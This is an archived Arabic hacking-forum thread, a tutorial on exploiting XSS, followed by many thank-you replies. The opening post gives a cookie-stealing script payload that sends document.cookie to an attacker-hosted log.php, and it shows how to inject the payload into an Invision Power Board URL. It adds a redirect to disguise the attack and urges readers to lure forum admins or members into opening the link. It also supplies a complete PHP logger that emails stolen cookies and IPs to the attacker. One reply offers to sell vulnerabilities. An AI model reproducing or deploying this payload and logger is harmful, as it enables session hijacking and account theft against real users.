تسجيل الدخول

مشاهدة النسخة كاملة : الدرس السابع استغلال ثغرة xss



pSyCh0_3D
09-14-2011, 10:46 PM
بسم الله الرحمان الرحيم
كيفكم شباب اليوم معي شرح مبسط لثغرة XSS
نتابع الشرح

طيب نأتي الان الى الكود المهم في ثغرات xss
هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً في ثغرات xss

**********javascript:alert(document.******)</Script>

الأن الكود هذا لم يكون بالثغره سوف يظهر لك الكوكيز تبعك وهو يحتوي على نقاط مهمه وهي :
1- رقم العضويه
2- الباسورد مشفر md5
3 - الباسورد مشفر Hash

ورقم الاستايل وغيره ,, على حسب نوعيه البرنامج المصاب!

طيب الحين وجدت هذا الكود سوف نربطه باللوج

ماهو اللوج ؟
اللوج هذا تربطه مع السكربت الذي ياتي بالكوكيز ,, وبعد ان تربطه كل من فتح السكربت وهو مربوط باللوج سوف يسجل معلومات الكوكيز تبعه باللوج او يرسل الى ايميلك ( على حسب اللوج )

طيب الان بعد ما ربطته اصبح الرابط :


**********location.href="http://www.xxxxx.com/log.php?id="+document.******</Script>

تمام الان :
www.xxx.com = الموقع المربوط فيه اللوج
log.php = اسم ملف اللوج
طيب الحين نرفع اللوج على اي موقع عندك وبعد كذا تستبدل
www.xxx.com/log.php برابط اللوج الي عندك

المهم الان هذا السكربت اصبح جاهزا للاستعمال سوف نضعه بكود الثغره ونستبدل :


**********javascript:alert(document.******)</Script>

بـ


**********location.href="http://www.xxxxx.com/log.php?id="+document.******</Script>

الان نخلي مثلا المدير العام او اي عضو تبي تسرق الكوكيز تبعه انه يفتح الرابط

بتقول كيف بقولك ياااولد انت وراااااسك عاد بطريقتك خليه يفتح الرابط

طيب الحين بتقولي والله فضيحه يا pSyCh0 لو اخليه يفتح الرابط يطلع عنده اللوج وبيكشفني

بقوله ولا يهمك اخوي نربطه كمان بموقع للتمويه

مثلا نربطه بموقع www.google.com بحيث انه لم يفتح الثغره والمربوط فيها اللوج وموقع جوجل راح يتحول اوتوماتيك الى جوجل مبسط استغلال ثغرات (موضوع تطبيق وبكذا مايشك

بتقول كيف يا pSyCh0 بقولك كذا نضع بعد رابط اللوج :
re=www.google.com&
بس مبسط استغلال ثغرات (موضوع تطبيق
بحيث يكون بعد & يوجد id ... الخ
يعني يكون الكود :


**********location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+document.******</Script>

طبعا انت استبدل www.google.com باي موقع تبغاه ويفضل يكون الموقع الي مصاب فيه الثغره (1)

طيب الحين تقول كذا تمام يا pSyCh0 يالله عطنا مثااال

بعطيكم مثال لثغره :Invision Power Board

الكود للثغره :
http://xxx.com/forums/index.php?act=idx='>**********alert(document.******)</script>
احنا راح نستبدل :


**********javascript:alert(document.******)</Script>

بـ


**********location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+document.******</Script>

واستبدل هنا موقع جوجل باي موقع تبغاه

ورابط اللوج www.xxx.com/log.php باللوج تبعك

====================
تطبيق :

التطبيق هنا :


http://www.test.com/forums/index.php?act=idx='>**********alert(document.******)</script>

اللوج :


<?php
// Thnx For Aljyyosh Team - http://www.aljyyosh.com/ - http://www.aljyyosh.com//vb
//----- S4a Logger v0.10 -----//
// Star
//Your Email --::--
$ToGet = "[email protected]";
////////////////////////////////
$Ip = $REMOTE_ADDR;
$Sys = $HTTP_USER_AGENT;
//////////////////////////////////////////////
if($ToGet == ''){echo 'Edit Your Email Befor You Use Me !!'; exit();}
//
$Time = date("l dS of F Y h:i:s A");

$Hdr = 'From: Logger <logger@secourty>';

$Msg = '
Hi ,, Mr.Attacker :D
-------------------------------------------
- Thnx For Aljyyosh Team ,, For Aljyyosh Forum -
---------------------------------------------------------------------
---------------------------------------------------------------------
- IP ::- [ ' .$Ip.' ]
- System ::- [ '.$Sys.' ]
- The ****** ::- [ '.$id.' ]
- Time ::- [ '.$Time.' ]
---------------------------------------------------------------------
- root@devil00 ~ ./evilcat /etc/passwd -
- root@devil00 ~ ./s4acracker passwd --log <log.log> && -
---------------------------------------------------------------------
';
$send = mail($ToGet,'S4a - [ New****** ]',$Msg,$Hdr);
//
/* &@#&@#&@#&@#&@#&@#&@# code ,, By pSyCh0_3D [ :D ] << v0.10 */
if(isset($_GET["re"])){
$&@#&@#&@#&@#&@#&@#&@# = $_GET["re"];
if($&@#&@#&@#&@#&@#&@#&@# == ""){
mail ($ToGet,'S4a - [Error]','&@#&@#&@#&@#&@#&@#&@# Is Set And Its Empty !!',$Hdr);
}else{
header("location:".$&@#&@#&@#&@#&@#&@#&@#);
}
}
//
?>

استبدل هنا :


$ToGet = "[email protected]";

الايميل: [email protected]
بالايميل تبعك !

واحفظه بامتداد php طبعا افتح المفكره وحط الكود ولاتنسى تغير الايميل واحفظه بامتداد php
وارفعه على موقعك

Hidden pain
09-15-2011, 12:30 PM
شكرا لك
من الافضل ان ترفق سكربت ال php احسن اخي

boykiller
09-22-2011, 07:27 PM
مشكور وماقصرت يالغلا
والله يعافيك
تقبل مروري المتوآضع

HaCKer011
09-22-2011, 07:56 PM
مشكوووووور اخي تقبل مروري

pSyCh0_3D
09-27-2011, 10:45 PM
منورين الموظوع

amine123
10-01-2011, 05:41 PM
مشكور وماقصرت يالغلا
والله يعافيك
تقبل مروري المتوآضع

pSyCh0_3D
10-02-2011, 12:06 PM
منور حبيبي

صايدهم
10-02-2011, 10:47 PM
تتبغى الصراحة وربي اروع دوره شفتها
يعطيك العافييه يا عسل
همسة ( يالييت لو تسوي شرح فديو وتطبق عشان توضح الطريقة )

simomz
10-03-2011, 04:02 PM
تقبل مروري

jeano3
10-14-2011, 06:34 PM
يسلموووووووووووووووووا

pSyCh0_3D
10-15-2011, 03:18 AM
اهلا حبيبي منور الموضوع

Predator of Morocco
11-10-2011, 12:12 PM
موضوع جيد. حياك الله

hmezkcq
04-01-2012, 11:19 PM
مبدع مبدع مبدع مبدع مبدع مبدع مبدع مبدع

مشاري احمد
04-02-2012, 12:19 AM
مشكوررر يعطيك الف عافيه

MǿňŦĂ
04-03-2012, 11:01 AM
بصراحة موضوع روعة مشكورا جداا على شرح رائع

maghribii
04-17-2012, 05:15 PM
مبدع دائما في مواضيعك

ان شاء الله اني احاول اتعلم واستفيد

hymoo hkrz
05-30-2012, 02:43 AM
مشكوووورررر^_^

Omar hcj
08-06-2012, 12:19 PM
مشكووووووووووووووووور

pSyCh0_3D
09-04-2012, 09:08 PM
منور حبيبي تسلم

dark haCk
09-04-2012, 09:29 PM
مشكوررررررررررررررررررررر رر ويعطيك الف عافية شرح ولا اروع ,, تحياتي لك :)

yurirevenge
09-08-2012, 01:31 PM
مشكور موضوع جميل

hakim021
05-17-2013, 12:21 AM
السلام عليك أخي الفاضل حياك الله و جدت 30 ثغرة لموقع الباي بال و هي ثغلة و جتها بنفسها تبحث عن الثغرات يرجا أن تراسلني على [email protected] بأسرع وقت لأن واحد سرق مني الثغرات وغايف ابيعها و شكرا

Saad.Nabir111
05-17-2013, 02:27 AM
شكرا جزيلا فى انتظار المزيد
http://www.freeimagehost.info/files/img/user_uploads/displayimage.php?id=31z6ayyvo08310001.gif

iFox
06-13-2013, 05:54 AM
مشكور جدا اخى

hacker mizo
06-22-2013, 07:13 PM
مشكوووور يا غالي على الشرح الجميل

wassimdaily
02-16-2015, 07:05 AM
جميييييييييييييييييييييل شرحك جدا... بس كيف الكوكيز تبعه يوصل لي.. وضح الطريقة ارجوك